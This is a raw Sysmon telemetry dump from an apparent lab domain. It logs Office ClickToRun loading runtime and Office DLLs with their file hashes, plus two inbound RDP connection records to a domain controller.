Shared\OFFICE16\vccorlib140.dllMD5=DDD9457EF184CC3897B8198D262F4339,SHA256=41B6AF9484C860804C69E00C9D7FEE22EFE5F769C51355936FC9DE248221DE94,IMPHASH=4A5F3C3AA39A4E0497DFF0471239D5F9truetrue 23542300x800000000000000071024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\VBAJET32.DLLMD5=A302D22CC544B6BFB4E1BB522B036CB1,SHA256=76823CF79F5C76C96E2FCA31D06796D62727ABE559FFBA78E5F21DC324E55188,IMPHASH=027F3DD417A1D5A85A3741AE4A80B27Btruetrue 23542300x800000000000000071023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ucrtbase.dllMD5=ED27C615D14DADBE15581E8CB7ABBE1C,SHA256=1CA33187B0E81CD0B181A554718CAFFF2D17C3F6795E6E0824F844ABFBADDC07,IMPHASH=5E97252FEC9CAEB9BB1DDC7CC50F68A6truetrue 23542300x800000000000000071022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\TextIntelligence.dllMD5=A1C2CB511BC1B8EB70CC933652818796,SHA256=AD48C14A069270BA6691C127705EFD2C275C0ABAFBCE04FF4DC0CA6899EA07D3,IMPHASH=DF63C575F83A6261461E0F5CEA5A41C4truetrue 23542300x800000000000000071021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\RICHED20.DLLMD5=F909EFB9BB619D4C232398616C8509B1,SHA256=DEE8ED8BD4B0770446C0A033802C82DC61D0F001A3754FF8FCE2D17B89F24F28,IMPHASH=5889F6CF0E9EA19E42C205DE07AA528Dtruetrue 23542300x800000000000000071020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfigOnLogon.xmlMD5=95C80BBE7F67A3252306F706A5716CD1,SHA256=C6C5C58E95302D767632363CC0D440A20936C15FE139770B37C06C85FBF961BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfig.xmlMD5=F24F9ABEC3A753455E03F69C401EE844,SHA256=0A994049FBADB1602C9412CBF21C9C38E38170CA8C95A160D3BAF7E4407D0A24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\oregres.dllMD5=CE8534E82AAC31DE9D5241624FD95A8C,SHA256=AFE13CB8A3F12E8CDDF794261562EA51070444EBAE218B9757B67239349E0270,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OPTINPS.DLLMD5=4A177F0974FCD9548E9B986C8A05C573,SHA256=AD3D55FF17EAE5B906AF911119B26B26904A11F74DD0607CE5F9463CF738B7B9,IMPHASH=C4573F1441092B4DCB3CF557FE922798truetrue 23542300x800000000000000071016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeMD5=EDFE7F21516814D34D742DC5F700B764,SHA256=68F915C5D3F23DE7CCE84AAD49712F752F2D0C389241DB9C015D5A91EB821395,IMPHASH=60244D5C592B6E379D7E16C6D941A014truetrue 23542300x800000000000000071015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OFFREL.DLLMD5=17D33181597858784E8E3E9A89B26AA8,SHA256=8FA61DF75068B77E305B194C8902B4979BD4B271172DECA55FCE3F02ED713303,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLLMD5=D8EF71E15F311C42C0058AAB386B4CF3,SHA256=AC3E4477AF28B809AE72A6AA2C70B4ACFE21C188AD1E3924867135D206A6A8BA,IMPHASH=E2EFEDC1606A995E06D8A55F92E79CB7truetrue 23542300x800000000000000071013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLLMD5=9113FC2C480CD27BA7ACA3239DDDF60F,SHA256=2932EAA382EE320460A3259F8E6AAA0A58F6D76072A6A718D2DBF60A1FA602F6,IMPHASH=D74BCD6327BF283B918DC169009C6072truetrue 23542300x800000000000000071012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUAUTH.CABMD5=F984F9C2D7AEFABDB51E772941087133,SHA256=B74549A7FC9BD485E99A45802F81530C75B814CB0BD7FDE1DF861EB805E8D755,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dllMD5=49FB6E786B2F9DF8812E0E317CED55CB,SHA256=9461F2E4ADD5C650102ACDE0C62377FF86D9B19FC20D0003F326CCD474E8B7B9,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000071010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4,IMPHASH=C0E775D13A8146396B3DE4DC441694A7truetrue 23542300x800000000000000071009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dllMD5=8C8D1140787DA60A343DD11C1CDF4992,SHA256=6AA1ECE9DD340D05AEC43248592A78B70D21959DE8727F506D21A3A962348583,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000071008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSSOAP30.DLLMD5=4CB93C0AE0868E82B6E300B193F302AE,SHA256=86D552CF2E48B64310D97D59FFBBD83E1F05DFC0598B67F0E509C4ACB706B394,IMPHASH=FE0F2D1714FB6DA1C36E4170AF64F0B1truetrue 23542300x800000000000000049813Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:46.152{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E700E715FC394D7F0A36BBF2D59DB25,SHA256=61789E9BBBD034D8A498677F2E88E2BDE9BDF1D6D7CC6F4776BB6B9C7E9AD2FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso20win32client.dllMD5=4900965B0CFAB0BBE26628E7648A0EEE,SHA256=DC50BAA0E7D842D4CD73FB12026E4DD99620E2AEBCEC5834634B0EF03DF0F246,IMPHASH=9F400A044EB3EE62E181AC8AFD0C4FCEtruetrue 354300x800000000000000071326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.268{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46783-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000071325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.162{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54982-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000071324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO.DLLMD5=7132CB4EB841BBCDE59B1F9855E1C1DF,SHA256=ABFFEE180477D5F6857F8FD96996085AA01B3F309EEA2664D1DCB6EA8B7C5379,IMPHASH=1C478C973BD7FB004FE6C6B817C488DFtruetrue 23542300x800000000000000071323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\mfc140u.dllMD5=F8EBBB4C28AB643471B124701DA5B71A,SHA256=DF8543E39C6C04440734A26B25A8ADB34460D4AD08FD41E2468F067F1284E582,IMPHASH=C2C401022BB95036E7638802C8DA49BDtruetrue 23542300x800000000000000071322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dllMD5=40E4365F7869AB1A86BCC54FE94E7E06,SHA256=D879D5B6A020218C720FD773D1DFFC337726E1F2A57DD78BCB24081781977038,IMPHASH=4CE3ECB60D9477AC5017180FE7F5BD15truetrue 23542300x800000000000000071321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\concrt140.dllMD5=773091E3923378F9B529CDA45E32C489,SHA256=6CC8FA5CE54B2B8C99E22A0E37179EBA9D418568D142AC58FAD52DD28E867A17,IMPHASH=720042EA97BFDE1DFC328C5715BE448Dtruetrue 23542300x800000000000000071320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dllMD5=D6ABF5C056D80592F8E2439E195D61AC,SHA256=8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dllMD5=1FA7C2B81CDFD7ACE42A2A9A0781C946,SHA256=CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dllMD5=5E72659B38A2977984BBC23ED274F007,SHA256=44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dllMD5=32D7B95B1BCE23DB9FBD0578053BA87F,SHA256=104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dllMD5=AE3FA6BF777B0429B825FB6B028F8A48,SHA256=66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dllMD5=8F8A47617DFD829A63E3EC4AFF2718D9,SHA256=6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dllMD5=1DD5666125B8734E92B1041139FA6C37,SHA256=D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dllMD5=809BC1010EAF714CD095189AF236CE2F,SHA256=B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dllMD5=D0D380AF839124368A96D6AA82C7C8AE,SHA256=06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dllMD5=E70D8FE9D21841202B4FD1CF55D37AC5,SHA256=E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dllMD5=39D81596A7308E978D67AD6FDCCDD331,SHA256=3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dllMD5=AB8734C2328A46E7E9583BEFEB7085A2,SHA256=921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dllMD5=45C54A21261180410091CEFB23F6A5AE,SHA256=2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dllMD5=5245F303E96166B8E625DD0A97E2D66A,SHA256=90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dllMD5=3B038338C1EB179D8EEE3883CF42BC3E,SHA256=C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dllMD5=E20C50CB320A5718AE869D8EC4D460CA,SHA256=48C776F38EAED72CB05A993484F60CBFDF5AF59AEBC48E53481A997AE7DED8DC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dllMD5=A20084F41B3F1C549D6625C790B72268,SHA256=0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1,IMPHASH=00000000000000000000000000000000truetrue 